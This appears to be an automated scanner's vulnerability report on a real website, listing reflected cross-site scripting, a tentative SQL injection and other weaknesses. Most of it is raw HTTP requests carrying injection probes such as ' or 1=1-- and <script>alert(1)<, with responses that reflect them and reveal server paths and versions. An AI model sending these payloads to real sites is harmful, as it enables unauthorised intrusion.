2. Cross-site scripting (reflected)
2.4. http://www.geek.com/images/phpThumb.php [REST URL parameter 2]
2.5. http://www.geek.com/images/phpThumb.php [name of an arbitrarily supplied request parameter]
2.6. http://www.geek.com/images/phpThumb.php [src parameter]
2.7. http://www.geek.com/wp-content/plugins/digg-digg/css/diggdigg-style.css [REST URL parameter 1]
2.8. http://www.geek.com/wp-content/plugins/digg-digg/css/diggdigg-style.css [REST URL parameter 2]
2.9. http://www.geek.com/wp-content/plugins/digg-digg/css/diggdigg-style.css [REST URL parameter 3]
2.10. http://www.geek.com/wp-content/plugins/digg-digg/css/diggdigg-style.css [REST URL parameter 4]
2.11. http://www.geek.com/wp-content/plugins/digg-digg/css/diggdigg-style.css [REST URL parameter 5]
2.12. http://www.geek.com/wp-content/plugins/wp-polls/polls-css.css [REST URL parameter 1]
2.13. http://www.geek.com/wp-content/plugins/wp-polls/polls-css.css [REST URL parameter 2]
2.14. http://www.geek.com/wp-content/plugins/wp-polls/polls-css.css [REST URL parameter 3]
2.15. http://www.geek.com/wp-content/plugins/wp-polls/polls-css.css [REST URL parameter 4]
2.16. http://www.geek.com/wp-content/plugins/wp-polls/polls-js.js [REST URL parameter 1]
2.17. http://www.geek.com/wp-content/plugins/wp-polls/polls-js.js [REST URL parameter 2]
2.18. http://www.geek.com/wp-content/plugins/wp-polls/polls-js.js [REST URL parameter 3]
2.19. http://www.geek.com/wp-content/plugins/wp-polls/polls-js.js [REST URL parameter 4]
2.20. http://www.geek.com/wp-content/themes/geek6/favicon.ico [REST URL parameter 1]
2.21. http://www.geek.com/wp-content/themes/geek6/style.css [REST URL parameter 1]
2.22. http://www.geek.com/wp-content/themes/geek6/style.css [REST URL parameter 2]
2.23. http://www.geek.com/wp-content/themes/geek6/style.css [REST URL parameter 3]
2.24. http://www.geek.com/wp-content/themes/geek6/style.css [REST URL parameter 4]
2.25. http://www.geek.com/wp-content/themes/geek6/styles/redesign.css [REST URL parameter 1]
2.26. http://www.geek.com/wp-content/themes/geek6/styles/redesign.css [REST URL parameter 2]
2.27. http://www.geek.com/wp-content/themes/geek6/styles/redesign.css [REST URL parameter 3]
2.28. http://www.geek.com/wp-content/themes/geek6/styles/redesign.css [REST URL parameter 4]
2.29. http://www.geek.com/wp-content/themes/geek6/styles/redesign.css [REST URL parameter 5]
2.30. http://www.geek.com/wp-includes/js/jquery/jquery.js [REST URL parameter 1]
2.31. http://www.geek.com/wp-includes/js/jquery/jquery.js [REST URL parameter 2]
2.32. http://www.geek.com/wp-includes/js/jquery/jquery.js [REST URL parameter 3]
2.33. http://www.geek.com/wp-includes/js/jquery/jquery.js [REST URL parameter 4]
2.34. http://www.geek.com/wp-includes/js/l10n.js [REST URL parameter 1]
2.35. http://www.geek.com/wp-includes/js/l10n.js [REST URL parameter 2]
2.36. http://www.geek.com/wp-includes/js/l10n.js [REST URL parameter 3]
3. Cleartext submission of password
4. Password field with autocomplete enabled
5. Cross-domain script include
7. Content type incorrectly stated
7.1. http://www.geek.com/wp-content/themes/geek6/scripts/ajax_actions.js.php
7.2. http://www.geek.com/wp-content/themes/geek6/scripts/commonjs.php
7.3. http://www.geek.com/wp-content/themes/geek6/scripts/search.js.php
Severity: | High |
Confidence: | Tentative |
Host: | http://www.geek.com |
Path: | /wp-content/themes/geek6 |
GET /wp-content/themes/geek679240031'%20or%201%3d1-- Host: www.geek.com Proxy-Connection: keep-alive Referer: http://www.geek.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Server: nginx/0.8.53 Content-Type: text/html; charset=UTF-8 X-Powered-By: PHP/5.2.17 Pragma: no-cache Last-Modified: Tue, 10 May 2011 13:30:02 GMT Vary: Cookie X-Pingback: http://www.geek.com Content-Length: 44307 X-Varnish: 1842939858 Vary: Accept-Encoding Cache-Control: no-cache, must-revalidate Expires: Tue, 10 May 2011 13:29:40 GMT Date: Tue, 10 May 2011 13:29:40 GMT Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <script type="text/javascri ...[SNIP]... <img alt="" src="http://www.geek.com <h4><a href="http://www.geek.com </li> <li> <img alt="" src="http://www.geek.com <h4><a href="http://www.geek.com </li> <li> <img alt="" src="http://www.geek.com <h4><a href="http://www.geek.com </li> <li> <img alt="" src="http://www.geek.com <h4><a href="http://www.geek.com </li> <li> <img alt="" src="http://www.geek.com <h4><a href="http://www.geek.com ...[SNIP]... |
GET /wp-content/themes/geek679240031'%20or%201%3d2-- Host: www.geek.com Proxy-Connection: keep-alive Referer: http://www.geek.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Server: nginx/0.8.53 Content-Type: text/html; charset=UTF-8 X-Powered-By: PHP/5.2.17 Pragma: no-cache Last-Modified: Tue, 10 May 2011 13:29:57 GMT Vary: Cookie X-Pingback: http://www.geek.com Content-Length: 44379 X-Varnish: 924435317 Vary: Accept-Encoding Cache-Control: no-cache, must-revalidate Expires: Tue, 10 May 2011 13:29:42 GMT Date: Tue, 10 May 2011 13:29:42 GMT Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <script type="text/javascri ...[SNIP]... <img alt="" src="http://www.geek.com <h4><a href="http://www.geek.com </li> <li> <img alt="" src="http://www.geek.com <h4><a href="http://www.geek.com </li> <li> <img alt="" src="http://www.geek.com <h4><a href="http://www.geek.com </li> <li> <img alt="" src="http://www.geek.com <h4><a href="http://www.geek.com </li> <li> <img alt="" src="http://www.geek.com ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.geek.com |
Path: | /articles/geek-pick |
GET /articles/geek-pick/63398--><script>alert(1)< Host: www.geek.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Server: nginx/0.8.53 Content-Type: text/html; charset=UTF-8 X-Powered-By: PHP/5.2.17 X-Pingback: http://www.geek.com Last-Modified: Tue, 10 May 2011 13:27:41 GMT Content-Length: 44872 X-Varnish: 1842939106 Expires: Tue, 10 May 2011 13:27:20 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Tue, 10 May 2011 13:27:20 GMT Connection: close Vary: Accept-Encoding Set-Cookie: PHPSESSID=2bd2ee574c <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <script type="text/javascri ...[SNIP]... <!-- www.geek.com /index.php /articles/geek-pick/63398--><script>alert(1)< ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.geek.com |
Path: | /articles/geek-pick |
GET /articles/geek-pick Host: www.geek.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Server: nginx/0.8.53 Content-Type: text/html; charset=UTF-8 X-Powered-By: PHP/5.2.17 Last-Modified: Tue, 10 May 2011 13:23:23 GMT Vary: Cookie X-Pingback: http://www.geek.com X-Varnish: 1842937702 Vary: Accept-Encoding Expires: Tue, 10 May 2011 13:23:02 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Tue, 10 May 2011 13:23:02 GMT Connection: close Set-Cookie: PHPSESSID=9e7f6e9c93 Set-Cookie: THECODE=p13t1 Content-Length: 56842 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <script type="text/javascri ...[SNIP]... <!-- www.geek.com /index.php /articles/geek-pick ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.geek.com |
Path: | /articles/geek-pick |
GET /articles/geek-pick Host: www.geek.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Server: nginx/0.8.53 Content-Type: text/html; charset=UTF-8 X-Powered-By: PHP/5.2.17 Last-Modified: Tue, 10 May 2011 13:23:16 GMT Vary: Cookie X-Pingback: http://www.geek.com X-Varnish: 1842937683 Vary: Accept-Encoding Expires: Tue, 10 May 2011 13:22:55 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Tue, 10 May 2011 13:22:55 GMT Connection: close Set-Cookie: PHPSESSID=5922edfd9d Set-Cookie: THECODE=p13t1 Content-Length: 56847 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <script type="text/javascri ...[SNIP]... <a href="http://del.icio.us ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.geek.com |
Path: | /images/phpThumb.php |
GET /images/phpThumb.php565bf--><script>alert(1)< Host: www.geek.com Proxy-Connection: keep-alive Referer: http://www.geek.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Server: nginx/0.8.53 Content-Type: text/html; charset=UTF-8 X-Powered-By: PHP/5.2.17 Pragma: no-cache Last-Modified: Tue, 10 May 2011 13:46:10 GMT Vary: Cookie X-Pingback: http://www.geek.com Content-Length: 44537 X-Varnish: 1842943456 Vary: Accept-Encoding Cache-Control: no-cache, must-revalidate Expires: Tue, 10 May 2011 13:45:48 GMT Date: Tue, 10 May 2011 13:45:48 GMT Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <script type="text/javascri ...[SNIP]... <!-- www.geek.com /index.php /images/phpThumb.php565bf--><script>alert(1)< ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.geek.com |
Path: | /images/phpThumb.php |
GET /images/phpThumb.php?src= Host: www.geek.com Proxy-Connection: keep-alive Referer: http://www.geek.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Server: nginx/0.8.53 Content-Type: image/png X-Powered-By: PHP/5.2.17 Content-Length: 655 X-Varnish: 1842943267 Date: Tue, 10 May 2011 13:45:12 GMT Connection: close .PNG . ...IHDR.......d........4... ...[SNIP]... <br> phpThumb() v1.7.8-200709161750 Forbidden parameter: c5dab<script>alert(1)< |
Severity: | High |
Confidence: | Certain |
Host: | http://www.geek.com |
Path: | /images/phpThumb.php |
GET /images/phpThumb.php?src= Host: www.geek.com Proxy-Connection: keep-alive Referer: http://www.geek.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Server: nginx/0.8.53 Content-Type: image/png X-Powered-By: PHP/5.2.17 Content-Length: 936 X-Varnish: 924438743 Date: Tue, 10 May 2011 13:44:56 GMT Connection: close .PNG . ...IHDR.......d........4... ...'7V.),z.d.Xf........?. ...[SNIP]... <br> phpThumb() v1.7.8-200709161750 "/var/local/geekcom/www |
Severity: | High |
Confidence: | Certain |
Host: | http://www.geek.com |
Path: | /wp-content/plugins/digg |
GET /wp-content77fa0--><script>alert(1)< Host: www.geek.com Proxy-Connection: keep-alive Referer: http://www.geek.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Server: nginx/0.8.53 Content-Type: text/html; charset=UTF-8 X-Powered-By: PHP/5.2.17 Pragma: no-cache Last-Modified: Tue, 10 May 2011 13:27:26 GMT Vary: Cookie X-Pingback: http://www.geek.com Content-Length: 44402 X-Varnish: 1154909849 Vary: Accept-Encoding Cache-Control: no-cache, must-revalidate Expires: Tue, 10 May 2011 13:27:35 GMT Date: Tue, 10 May 2011 13:27:35 GMT Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <script type="text/javascri ...[SNIP]... <!-- www.geek.com /index.php /wp-content77fa0--><script>alert(1)< ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.geek.com |
Path: | /wp-content/plugins/digg |
GET /wp-content/pluginsf1301--><script>alert(1)< Host: www.geek.com Proxy-Connection: keep-alive Referer: http://www.geek.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Server: nginx/0.8.53 Content-Type: text/html; charset=UTF-8 X-Powered-By: PHP/5.2.17 Pragma: no-cache Last-Modified: Tue, 10 May 2011 13:29:42 GMT Vary: Cookie X-Pingback: http://www.geek.com Content-Length: 44402 X-Varnish: 1842939755 Vary: Accept-Encoding Cache-Control: no-cache, must-revalidate Expires: Tue, 10 May 2011 13:29:20 GMT Date: Tue, 10 May 2011 13:29:20 GMT Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <script type="text/javascri ...[SNIP]... <!-- www.geek.com /index.php /wp-content/pluginsf1301--><script>alert(1)< ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.geek.com |
Path: | /wp-content/plugins/digg |
GET /wp-content/plugins/digg Host: www.geek.com Proxy-Connection: keep-alive Referer: http://www.geek.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Server: nginx/0.8.53 Content-Type: text/html; charset=UTF-8 X-Powered-By: PHP/5.2.17 Pragma: no-cache Last-Modified: Tue, 10 May 2011 13:31:49 GMT Vary: Cookie X-Pingback: http://www.geek.com Content-Length: 44402 X-Varnish: 1842940375 Vary: Accept-Encoding Cache-Control: no-cache, must-revalidate Expires: Tue, 10 May 2011 13:31:29 GMT Date: Tue, 10 May 2011 13:31:29 GMT Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <script type="text/javascri ...[SNIP]... <!-- www.geek.com /index.php /wp-content/plugins/digg ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.geek.com |
Path: | /wp-content/plugins/digg |
GET /wp-content/plugins/digg Host: www.geek.com Proxy-Connection: keep-alive Referer: http://www.geek.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Server: nginx/0.8.53 Content-Type: text/html; charset=UTF-8 X-Powered-By: PHP/5.2.17 Pragma: no-cache Last-Modified: Tue, 10 May 2011 13:33:17 GMT Vary: Cookie X-Pingback: http://www.geek.com Content-Length: 44402 X-Varnish: 1154911444 Vary: Accept-Encoding Cache-Control: no-cache, must-revalidate Expires: Tue, 10 May 2011 13:33:26 GMT Date: Tue, 10 May 2011 13:33:26 GMT Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <script type="text/javascri ...[SNIP]... <!-- www.geek.com /index.php /wp-content/plugins/digg ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.geek.com |
Path: | /wp-content/plugins/digg |
GET /wp-content/plugins/digg Host: www.geek.com Proxy-Connection: keep-alive Referer: http://www.geek.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Server: nginx/0.8.53 Content-Type: text/html; charset=UTF-8 X-Powered-By: PHP/5.2.17 Last-Modified: Tue, 10 May 2011 13:35:43 GMT Vary: Cookie X-Pingback: http://www.geek.com Content-Length: 44474 X-Varnish: 924436911 Expires: Tue, 10 May 2011 13:35:27 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Tue, 10 May 2011 13:35:27 GMT Connection: close Vary: Accept-Encoding Set-Cookie: PHPSESSID=b80c7c1a50 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <script type="text/javascri ...[SNIP]... <!-- www.geek.com /index.php /wp-content/plugins/digg ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.geek.com |
Path: | /wp-content/plugins/wp |
GET /wp-contentdbb7a--><script>alert(1)< Host: www.geek.com Proxy-Connection: keep-alive Referer: http://www.geek.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Server: nginx/0.8.53 Content-Type: text/html; charset=UTF-8 X-Powered-By: PHP/5.2.17 Pragma: no-cache Last-Modified: Tue, 10 May 2011 13:26:43 GMT Vary: Cookie X-Pingback: http://www.geek.com Content-Length: 44363 X-Varnish: 1154909542 Vary: Accept-Encoding Cache-Control: no-cache, must-revalidate Expires: Tue, 10 May 2011 13:26:51 GMT Date: Tue, 10 May 2011 13:26:51 GMT Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <script type="text/javascri ...[SNIP]... <!-- www.geek.com /index.php /wp-contentdbb7a--><script>alert(1)< ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.geek.com |
Path: | /wp-content/plugins/wp |
GET /wp-content/plugins9de82--><script>alert(1)< Host: www.geek.com Proxy-Connection: keep-alive Referer: http://www.geek.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Server: nginx/0.8.53 Content-Type: text/html; charset=UTF-8 X-Powered-By: PHP/5.2.17 Pragma: no-cache Last-Modified: Tue, 10 May 2011 13:29:05 GMT Vary: Cookie X-Pingback: http://www.geek.com Content-Length: 44435 X-Varnish: 924434973 Vary: Accept-Encoding Cache-Control: no-cache, must-revalidate Expires: Tue, 10 May 2011 13:28:49 GMT Date: Tue, 10 May 2011 13:28:49 GMT Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <script type="text/javascri ...[SNIP]... <!-- www.geek.com /index.php /wp-content/plugins9de82--><script>alert(1)< ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.geek.com |
Path: | /wp-content/plugins/wp |
GET /wp-content/plugins/wp Host: www.geek.com Proxy-Connection: keep-alive Referer: http://www.geek.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Server: nginx/0.8.53 Content-Type: text/html; charset=UTF-8 X-Powered-By: PHP/5.2.17 Pragma: no-cache Last-Modified: Tue, 10 May 2011 13:31:02 GMT Vary: Cookie X-Pingback: http://www.geek.com Content-Length: 44360 X-Varnish: 1842940161 Vary: Accept-Encoding Cache-Control: no-cache, must-revalidate Expires: Tue, 10 May 2011 13:30:41 GMT Date: Tue, 10 May 2011 13:30:41 GMT Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <script type="text/javascri ...[SNIP]... <!-- www.geek.com /index.php /wp-content/plugins/wp ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.geek.com |
Path: | /wp-content/plugins/wp |
GET /wp-content/plugins/wp Host: www.geek.com Proxy-Connection: keep-alive Referer: http://www.geek.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Server: nginx/0.8.53 Content-Type: text/html; charset=UTF-8 X-Powered-By: PHP/5.2.17 Last-Modified: Tue, 10 May 2011 13:33:13 GMT Vary: Cookie X-Pingback: http://www.geek.com Content-Length: 44435 X-Varnish: 924436185 Expires: Tue, 10 May 2011 13:32:57 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Tue, 10 May 2011 13:32:57 GMT Connection: close Vary: Accept-Encoding Set-Cookie: PHPSESSID=af1705dde7 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <script type="text/javascri ...[SNIP]... <!-- www.geek.com /index.php /wp-content/plugins/wp ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.geek.com |
Path: | /wp-content/plugins/wp |
GET /wp-contente859f--><script>alert(1)< Host: www.geek.com Proxy-Connection: keep-alive Referer: http://www.geek.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Server: nginx/0.8.53 Content-Type: text/html; charset=UTF-8 X-Powered-By: PHP/5.2.17 Pragma: no-cache Last-Modified: Tue, 10 May 2011 13:30:06 GMT Vary: Cookie X-Pingback: http://www.geek.com Content-Length: 44357 X-Varnish: 1842939889 Vary: Accept-Encoding Cache-Control: no-cache, must-revalidate Expires: Tue, 10 May 2011 13:29:44 GMT Date: Tue, 10 May 2011 13:29:44 GMT Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <script type="text/javascri ...[SNIP]... <!-- www.geek.com /index.php /wp-contente859f--><script>alert(1)< ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.geek.com |
Path: | /wp-content/plugins/wp |
GET /wp-content/pluginsb2f55--><script>alert(1)< Host: www.geek.com Proxy-Connection: keep-alive Referer: http://www.geek.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Server: nginx/0.8.53 Content-Type: text/html; charset=UTF-8 X-Powered-By: PHP/5.2.17 Pragma: no-cache Last-Modified: Tue, 10 May 2011 13:32:12 GMT Vary: Cookie X-Pingback: http://www.geek.com Content-Length: 44426 X-Varnish: 924435961 Vary: Accept-Encoding Cache-Control: no-cache, must-revalidate Expires: Tue, 10 May 2011 13:31:56 GMT Date: Tue, 10 May 2011 13:31:56 GMT Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <script type="text/javascri ...[SNIP]... <!-- www.geek.com /index.php /wp-content/pluginsb2f55--><script>alert(1)< ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.geek.com |
Path: | /wp-content/plugins/wp |
GET /wp-content/plugins/wp Host: www.geek.com Proxy-Connection: keep-alive Referer: http://www.geek.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Server: nginx/0.8.53 Content-Type: text/html; charset=UTF-8 X-Powered-By: PHP/5.2.17 Pragma: no-cache Last-Modified: Tue, 10 May 2011 13:34:22 GMT Vary: Cookie X-Pingback: http://www.geek.com Content-Length: 44429 X-Varnish: 924436479 Vary: Accept-Encoding Cache-Control: no-cache, must-revalidate Expires: Tue, 10 May 2011 13:34:07 GMT Date: Tue, 10 May 2011 13:34:07 GMT Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <script type="text/javascri ...[SNIP]... <!-- www.geek.com /index.php /wp-content/plugins/wp ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.geek.com |
Path: | /wp-content/plugins/wp |
GET /wp-content/plugins/wp Host: www.geek.com Proxy-Connection: keep-alive Referer: http://www.geek.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Server: nginx/0.8.53 Content-Type: text/html; charset=UTF-8 X-Powered-By: PHP/5.2.17 Last-Modified: Tue, 10 May 2011 13:36:03 GMT Vary: Cookie X-Pingback: http://www.geek.com Content-Length: 44357 X-Varnish: 1842941419 Expires: Tue, 10 May 2011 13:35:42 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Tue, 10 May 2011 13:35:42 GMT Connection: close Vary: Accept-Encoding Set-Cookie: PHPSESSID=f28e40f71f <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <script type="text/javascri ...[SNIP]... <!-- www.geek.com /index.php /wp-content/plugins/wp ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.geek.com |
Path: | /wp-content/themes/geek6 |
